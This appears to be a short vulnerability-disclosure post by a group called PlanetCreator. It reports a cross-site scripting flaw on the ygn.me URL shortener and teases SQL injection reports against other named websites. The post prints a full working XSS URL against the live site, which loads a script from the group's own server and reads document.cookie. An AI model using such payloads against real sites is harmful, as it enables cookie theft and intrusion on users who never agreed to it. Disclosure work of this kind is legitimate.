PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me
This vulnerability has been informed to :- webmaster

Test Link

http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

Critical SQL Injection in National Library, Ministry of Culture

PlanetCreator has reported another critical SQL Injection (vulnerability) on National Library, Ministry of Culture Website http://www.nlm.gov.mm/ SQL injection is a code injection technique that exploits a security vulnerability occurring in

Critical SQL Injection in Yadanapura : The Gateway to Myanmar Creative Industries

PlanetCreator has reported another critical SQL Injection (vulnerability) on Yadanapura : The Gateway to Myanmar Creative Industries http://www.yadanapura.com powered by IndexMyanmar This vulnerability has been alerted to :- [email protected] SQL

Critical Blind SQL injection in ChartNexus.com

PlanetCreator has reported another critical Blind SQL Injection (vulnerability) on http://www.starinvestorrelations.com/ which owned by FiNEX Solutions Pte. Ltd. (“FiNEX Solutions”) powered by http://www.chartnexus.com/ This vulnerability has been alerted to :-